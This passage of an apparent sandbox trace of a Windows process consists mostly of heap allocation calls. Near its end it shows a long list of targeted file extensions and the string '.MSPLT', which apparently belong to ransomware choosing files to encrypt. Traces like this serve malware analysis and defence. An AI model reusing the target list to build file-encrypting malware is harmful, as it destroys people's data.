Size=0x20) returned 0x4add18 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b3210 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae0d8 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe) returned 0x4b3408 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe) returned 0x4b3120 [0279.923] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4add18, Size=0x40) returned 0x487868 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe) returned 0x4b3150 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe) returned 0x4b31c8 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe) returned 0x4b32d0 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe) returned 0x4b31e0 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b3180 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b31f8 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae238 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b3240 [0279.924] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487868, Size=0x80) returned 0x4b39c8 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b3270 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b3288 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b32a0 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b32e8 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b3420 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b3438 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b3498 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae168 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b3480 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b34b0 [0279.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b34c8 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b34e0 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b3450 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b3468 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b6840 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b66f0 [0279.925] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b39c8, Size=0x100) returned 0x4b6a90 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6780 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6600 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6690 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b66c0 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6630 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6810 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae1a8 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b67c8 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6738 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6798 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6) returned 0x4ae188 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6768 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6828 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae138 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6708 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b65e8 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b6870 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6750 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b67b0 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6618 [0279.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe) returned 0x4b68a0 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b67e0 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b6648 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b67f8 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6720 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6660 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6678 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae148 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6858 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6888 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b66a8 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b65b8 [0279.926] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b6a90, Size=0x200) returned 0x4b6a90 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b65d0 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae1b8 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b66d8 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6918 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6a20 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6900 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b69c0 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6930 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b68b8 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b68d0 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b68e8 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b6990 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b6948 [0279.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6960 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6978 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b6a38 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b69a8 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b69d8 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b69f0 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b6a50 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6a68 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6a08 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b65a0 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae1c8 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6378 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6498 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b63c0 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae218 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6480 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b6528 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6558 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b63d8 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6570 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6588 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b62b8 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b64b0 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b62d0 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b6438 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b62e8 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b64f8 [0279.927] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6300 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b6318 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6330 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b64c8 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6540 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b63f0 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b64e0 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6450 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6510 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae108 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6) returned 0x4ae268 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6348 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6360 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6390 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b63a8 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6408 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b6420 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b6468 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d74f0 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7538 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7370 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d73e8 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7328 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d73b8 [0279.928] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b6a90, Size=0x400) returned 0x4d77a0 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d74c0 [0279.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d72c8 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d7400 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d72e0 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d73a0 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d72f8 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d7598 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d75b0 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7550 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7430 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae0e8 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7568 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d74d8 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7580 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7310 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7418 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d74a8 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe) returned 0x4d7340 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7358 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7388 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7448 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d73d0 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7460 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7478 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7520 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7490 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae288 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7508 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7760 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7640 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7748 [0279.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d76b8 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7778 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7628 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7610 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7658 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe) returned 0x4d7688 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7670 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe) returned 0x4d76a0 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d76d0 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d75c8 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7718 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7700 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7730 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d75e0 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d76e8 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d75f8 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d72b0 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7298 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7208 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d70b8 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7190 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7178 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7268 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d71d8 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7088 [0279.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d6fc8 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7130 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d71f0 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d70d0 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d6fe0 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d71a8 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4d71c0 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x12) returned 0x486370 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d70e8 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7148 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7100 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7220 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7238 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d70a0 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7250 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d6ff8 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7118 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7280 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7010 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7028 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7040 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7160 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7058 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7070 [0279.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d8250 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d82b0 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d82c8 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d82e0 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d82f8 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d8238 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d8310 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe) returned 0x4d8268 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d8328 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae098 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d8280 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae0a8 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d8220 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d8388 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d8298 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d8340 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d8358 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d81f0 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d8208 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d8370 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d81d8 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d7cb0 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7e90 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d7e18 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4d7c68 [0279.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7dd0 [0279.933] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae0b8 [0279.933] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7cf8 [0279.933] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4d7bf0 [0279.933] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d77a0, Size=0x800) returned 0x4d83b0 [0279.933] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0279.933] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b5280 | out: hHeap=0x470000) returned 1 [0279.933] lstrlenW (lpString="") returned 0 [0279.933] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d92f0 | out: hHeap=0x470000) returned 1 [0279.933] lstrlenW (lpString=".MSPLT") returned 6 [0279.933] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae118, Size=0x8) returned 0x4ae358 [0279.933] lstrlenW (lpString=".MSPLT") returned 6 [0279.933] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d9350 | out: hHeap=0x470000) returned 1 [0279.934] 